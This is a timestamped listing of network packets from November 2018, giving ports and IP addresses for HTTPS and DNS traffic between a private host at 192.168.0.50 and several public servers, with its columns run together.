    Nov 2, 2018 10:59:51.456614971 MEZ4924380192.168.0.5023.10.249.171
    Nov 2, 2018 10:59:51.459355116 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.461026907 MEZ804924323.10.249.171192.168.0.50
    Nov 2, 2018 10:59:51.737728119 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.737833977 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.737982988 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.738025904 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767595053 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767607927 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767656088 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767676115 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767726898 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767775059 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767782927 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.767787933 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768004894 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768012047 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768052101 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768059969 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768147945 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768155098 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768227100 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768234015 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768421888 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768429041 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768471003 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768479109 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768528938 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768536091 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768551111 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768610001 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768790007 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768796921 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768846989 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768853903 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768901110 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768930912 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.768991947 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769000053 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769179106 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769242048 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769249916 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769289017 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769296885 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769355059 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769361973 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769435883 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769568920 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769593954 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769661903 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769726038 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769794941 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769804955 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769813061 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.769870996 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770040035 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770162106 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770246029 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770308018 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770401001 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770407915 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770412922 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770418882 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770574093 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770644903 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770658016 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770663977 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770744085 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770750999 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770806074 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.770813942 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.771018982 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.771025896 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.771075964 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.771083117 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.771126032 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.045367956 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.045492887 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.045648098 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.045687914 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.045748949 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.045883894 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.046111107 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.046430111 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.046760082 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.047240973 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.047498941 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.048043966 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.048372030 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.050709009 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.083112955 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.083339930 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.084263086 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.084625006 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.084784031 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.085211992 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.085374117 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.086092949 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.086652040 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.087466955 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.087670088 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.088942051 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.089314938 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.089477062 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.090523005 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.090886116 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.091073036 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.092068911 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.119021893 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.119240999 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.120315075 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.121320963 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.121480942 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.122543097 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.122963905 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.123090982 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.124114037 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.323805094 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.324001074 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.324016094 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.324384928 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.324522972 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336760044 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336796999 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336803913 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336844921 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336852074 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336935997 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.336942911 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.337002993 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.337132931 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.337141037 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.337187052 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.337193966 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.337199926 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.362081051 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.362193108 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.362642050 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.362724066 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.362993002 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.363106966 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.363399029 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.363490105 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.363681078 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.364314079 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.364506960 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.365545034 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.365828037 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.365957022 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.369703054 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.390657902 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.391021013 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.398129940 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.398384094 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.399585009 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.399770021 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401393890 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401879072 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401890039 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401921988 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401928902 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401936054 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.401993990 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.402000904 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.402013063 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.402463913 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.406204939 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.416446924 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.423724890 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.423923969 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.424617052 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.424783945 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.428169966 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.428404093 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.432538033 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.432889938 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.436646938 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.436994076 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.437225103 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.437402010 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.452555895 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.452936888 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.461071014 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.461452961 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.602329016 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.602472067 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.602585077 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.602662086 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.602792025 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.602926970 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.603082895 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.615483999 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.641649008 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.642072916 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.644077063 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.644311905 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.648823977 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.648911953 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.648957968 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.649013996 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.649094105 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.649101973 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.663984060 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.664376020 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.674906969 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.675273895 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.679620028 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.679744959 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.680017948 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.681785107 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.681988955 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.682353973 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.682517052 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.692462921 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.692857981 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.694076061 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.694291115 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.708307981 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.708694935 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.713205099 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.713557959 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.715790033 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.716010094 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.717319965 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.717499971 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.721873045 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.722217083 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.723190069 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.723392010 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.748480082 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.748874903 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.750519037 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.750755072 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.752239943 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.752420902 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.753977060 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.754163027 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.756319046 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.756412983 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.756671906 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.756684065 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.756974936 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.757172108 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.781517982 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.781884909 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.880584002 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.880985022 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881052017 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881068945 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881082058 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881201982 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881237984 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881280899 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881299973 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881339073 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881375074 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881386995 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881424904 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881432056 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881464005 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:52.881498098 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881505013 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881532907 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881582022 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881592989 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881597996 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:52.881652117 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:55.191101074 MEZ5678853192.168.0.508.8.8.8
    Nov 2, 2018 10:59:55.216177940 MEZ53567888.8.8.8192.168.0.50
    Nov 2, 2018 10:59:55.217425108 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.233392000 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.233583927 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.234002113 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.249918938 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.251739979 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.251966953 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.252080917 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.252135038 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.252180099 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.252284050 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.295939922 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.312589884 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.312829971 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.313489914 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.364733934 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:55.375488043 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.380718946 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.464458942 MEZ44349245151.101.0.133192.168.0.50
    Nov 2, 2018 10:59:55.464870930 MEZ49245443192.168.0.50151.101.0.133
    Nov 2, 2018 10:59:57.881375074 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:57.881604910 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:57.884047031 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:57.884150982 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:57.884239912 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:57.884301901 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:57.901312113 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:57.901384115 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:57.901655912 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:58.179404020 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:58.179491043 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:58.503016949 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.607486010 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:58.607717991 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.608058929 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.713474989 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:58.713686943 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:58.713907003 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:58.713938951 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.714122057 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.724548101 MEZ5153653192.168.0.508.8.8.8
    Nov 2, 2018 10:59:58.744282007 MEZ53515368.8.8.8192.168.0.50
    Nov 2, 2018 10:59:58.768743992 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.873267889 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:58.873497963 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:58.874068975 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.016424894 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.016536951 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.016666889 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.016688108 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.016809940 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.016886950 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.016942978 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.017011881 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.017040014 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.017106056 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.017218113 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.017244101 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.017335892 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.017364979 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.017374039 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.017519951 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.121982098 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122211933 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122327089 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122437954 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.122442961 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122560024 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122591019 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.122677088 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122770071 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.122800112 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122828007 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.122914076 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.122975111 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.123084068 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.123182058 MEZ49246443192.168.0.50192.30.253.113
    Nov 2, 2018 10:59:59.123198032 MEZ44349246192.30.253.113192.168.0.50
    Nov 2, 2018 10:59:59.123405933 MEZ49246443192.168.0.50192.30.253.113
